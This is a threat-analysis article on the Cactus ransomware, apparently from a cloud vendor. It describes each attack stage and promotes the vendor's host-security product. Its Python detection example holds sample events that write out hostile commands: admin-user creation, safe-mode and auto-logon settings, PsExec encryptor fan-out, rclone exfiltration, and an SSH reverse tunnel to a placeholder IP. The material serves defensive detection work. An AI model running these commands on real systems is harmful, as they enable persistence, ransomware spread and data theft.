Inside the Cactus Ransomware: Attack Stages, Code Mechanics, and Defense Strategies
An in‑depth analysis of the 2023 Cactus ransomware reveals its multi‑stage attack chain—from initial VPN‑based intrusion and double‑extortion tactics to lateral movement, custom batch‑script encryption, and data exfiltration via RClone—followed by comprehensive Huawei Cloud HSS‑based protection recommendations.
A Recent High-Profile Ransomware Incident
First observed in 2023, the Cactus ransomware spread quickly, exploiting known vulnerabilities (especially in VPN appliances) to gain unauthorized access and establish footholds in compromised infrastructure. It keeps its own payload encrypted to evade static detection and relies on a mix of legitimate administration tools and custom scripts to deliver it stealthily. Victims to date are concentrated in manufacturing and professional services across nine countries.
Cactus Ransomware: Initial Intrusion Phase
Initial access is gained primarily by exploiting known vulnerabilities in Fortinet VPN appliances, by exploiting internet-exposed Qlik Sense servers, and through malvertising campaigns that drop the DanaBot trojan, which is then used to deliver Cactus.
Cactus Ransomware: Infection and Execution Phase
After gaining access, Cactus establishes persistence, escalates privileges, moves laterally, discovers internal data, and disables security software. It sets up an SSH backdoor that is started by a scheduled task, scans the internal network with tools such as SoftPerfect Network Scanner, PSnmap.ps1 and ad hoc PowerShell commands, and installs legitimate remote‑access tools (Splashtop, AnyDesk, SuperOps RMM) to keep control of compromised hosts even if the original foothold is lost.
Credentials are harvested from browser data files and from the memory of the LSASS process. For command and control the operators use Chisel (a tunnelling proxy) and Cobalt Strike, both over encrypted channels. In the final stage, data is exfiltrated with tools such as RClone before the host's files are encrypted, so that the stolen data can be used as leverage if the victim does not pay.
Two batch scripts drive the deployment. f1.bat creates an administrative user, configures the machine to boot into safe mode, and sets automatic logon for that account, so the encryptor runs after a reboot in an environment where most endpoint security agents are not loaded. f2.bat extracts the encryption component from a 7‑Zip archive, deletes the archive and the executable, and launches the encryptor on other hosts across the internal network via PsExec.
Cactus Ransomware: Data Exfiltration Phase
Rather than custom malware, Cactus uses the legitimate cloud‑sync tool RClone to upload stolen data to attacker‑controlled external storage. Because RClone is a signed, widely used utility, its presence alone rarely triggers alerts; the exfiltration is best spotted by its context (an unusual host, a service account, large outbound transfers to a new destination).
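The infection, deployment and exfiltration behaviours above (f1.bat's account creation, safe‑mode boot and auto‑logon; f2.bat's archive extraction and PsExec fan‑out; the SSH scheduled task; the RClone upload) are individually noisy but together form a recognisable chain. The following added example, written for this article and not taken from Cactus, Huawei HSS or any vendor product, shows one way to correlate them: a small rule set over process‑creation events, grouped per host, that flags a host when activity from more than one stage is seen. The events, hostnames, paths, passwords and the IP address are constructed placeholders, and the thresholds are assumptions a defender would tune against their own baseline.

```python
"""Correlating Cactus-style deployment behaviour across process-creation events.

Illustrative example written for this article. It is not Cactus code and not
Huawei Cloud HSS logic. Events are constructed in a Sysmon-like shape; hosts,
paths, passwords and the IP address are placeholders.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set

# (rule name, attack stage, regex over the command line). Stage names are ours.
RULES = [
    ("local_admin_created", "prepare",
     r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b"),
    ("added_to_administrators", "prepare",
     r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b"),
    ("safeboot_configured", "prepare",                     # f1.bat: boot into safe mode
     r"\bbcdedit(?:\.exe)?\b.*\bsafeboot\b"),
    ("autologon_enabled", "prepare",                       # f1.bat: automatic logon
     r"\breg(?:\.exe)?\s+add\b.*\\Winlogon\b.*\bAutoAdminLogon\b"),
    ("ssh_scheduled_task", "persist",                      # SSH backdoor via schtasks
     r"\bschtasks(?:\.exe)?\s+/create\b.*\bssh(?:\.exe)?\b"),
    ("archive_extracted_with_password", "deploy",          # f2.bat: unpack encryptor
     r"\b7z[ar]?(?:\.exe)?\s+x\b.*\s-p\S*"),
    ("psexec_fanout", "deploy",                            # f2.bat: PsExec to other hosts
     r"\bpsexec(?:64)?(?:\.exe)?\s+\\\\"),
    ("rclone_upload", "exfiltrate",                        # data exfiltration
     r"\brclone(?:\.exe)?\s+(?:copy|sync|move)\b"),
]
COMPILED = [(n, s, re.compile(p, re.IGNORECASE)) for n, s, p in RULES]
STAGE_OF = {n: s for n, s, _ in RULES}
# Rules that are rare enough in normal administration to flag a host on their own
# (an assumption for this example; tune to your environment).
HIGH_CONFIDENCE = {"ssh_scheduled_task"}

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    # FS01: the f1.bat / f2.bat / RClone sequence described in the article.
    {"host": "FS01", "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net user sysadm P@ss123 /add"},
    {"host": "FS01", "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net localgroup administrators sysadm /add"},
    {"host": "FS01", "image": r"C:\Windows\System32\bcdedit.exe",
     "cmdline": "bcdedit /set {default} safeboot network"},
    {"host": "FS01", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f'},
    {"host": "FS01", "image": r"C:\ProgramData\7z.exe",
     "cmdline": r"7z.exe x -pSecretKey update.7z -oC:\ProgramData"},
    {"host": "FS01", "image": r"C:\ProgramData\PsExec.exe",
     "cmdline": r"PsExec.exe \\ws02,ws03,ws04 -accepteula -s -d C:\ProgramData\encryptor.exe"},
    {"host": "FS01", "image": r"C:\ProgramData\rclone.exe",
     "cmdline": r"rclone copy D:\Finance remote:bucket --transfers 8"},
    # DC01: a scheduled task that starts an SSH reverse tunnel at boot.
    {"host": "DC01", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc onstart /ru SYSTEM /tn "SystemUpdate" /tr "C:\Windows\System32\OpenSSH\ssh.exe -N -R 2222:127.0.0.1:3389 svc@203.0.113.10"'},
    # ADM02: a single legitimate PsExec use by an administrator (should not flag).
    {"host": "ADM02", "image": r"C:\Tools\PsExec.exe",
     "cmdline": r"PsExec.exe \\ws11 -s cmd /c ipconfig /all"},
    # WS07: ordinary user activity (should not flag).
    {"host": "WS07", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe --profile-directory=Default"},
]


def match_rules(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule whose pattern hits the event's command line."""
    cmd = event.get("cmdline", "")
    return [name for name, _stage, rx in COMPILED if rx.search(cmd)]


def correlate(events: List[Dict[str, str]], min_stages: int = 2,
              min_rules: int = 3) -> Dict[str, dict]:
    """Group rule hits per host and flag hosts where the chain, not one tool, is visible.

    One PsExec run or one rclone copy is everyday admin noise. A host showing
    activity from two or more stages, three distinct rules, or one
    high-confidence rule is reported as flagged.
    """
    per_host: Dict[str, Set[str]] = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(match_rules(ev))   # creates the key even on no hit
    report = {}
    for host, names in per_host.items():
        stages = {STAGE_OF[n] for n in names}
        flagged = (len(stages) >= min_stages or len(names) >= min_rules
                   or bool(names & HIGH_CONFIDENCE))
        report[host] = {"rules": sorted(names), "stages": sorted(stages),
                        "flagged": flagged}
    return report


if __name__ == "__main__":
    for host, r in correlate(SAMPLE_EVENTS).items():
        mark = "FLAG" if r["flagged"] else "ok  "
        print(f"{mark} {host:6} stages={r['stages']} rules={r['rules']}")
```

The per‑host grouping is the point: FS01 is flagged because preparation, deployment and exfiltration all appear on the same machine, DC01 is flagged by the single high‑confidence SSH task, while ADM02's lone PsExec call and WS07's browser activity are left alone. In production the same logic would run over real Sysmon or EDR process events, with a time window added so that hits from months apart are not stitched together.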
Ransomware Protection Scheme
Defense is organized around the three attack stages: intrusion, lateral spread, and encryption. Protective measures include pre‑attack identification, real‑time threat detection, automated containment, and post‑attack data recovery.
Pre‑Attack Identification and Defense
Huawei Cloud Host Security Service (HSS) offers risk‑prevention features such as baseline checks, vulnerability management, and container image scanning to reduce the attack surface.
Mid‑Stage Threat Detection
HSS detects brute‑force attempts, vulnerability exploits, webshells, reverse shells, viruses, trojans, and rootkits, providing full‑chain detection of ransomware tactics.
Mid‑Stage Monitoring and Response
Upon detecting ransomware activity, HSS can automatically isolate and eradicate the threat, preventing further spread.
Data Recovery
If encryption occurs, HSS supports one‑click data restoration from cloud backups, enabling rapid business continuity.
Ransomware Defense Recommendations
By analyzing Cactus, we see a complete ransomware lifecycle: intrusion, lateral movement, and encryption. Effective defense should address pre‑attack identification, mid‑stage detection, monitoring with automated response, and post‑incident recovery to minimize impact.
Huawei Cloud Developer Alliance
The Huawei Cloud Developer Alliance creates a tech sharing platform for developers and partners, gathering Huawei Cloud product knowledge, event updates, expert talks, and more. Together we continuously innovate to build the cloud foundation of an intelligent world.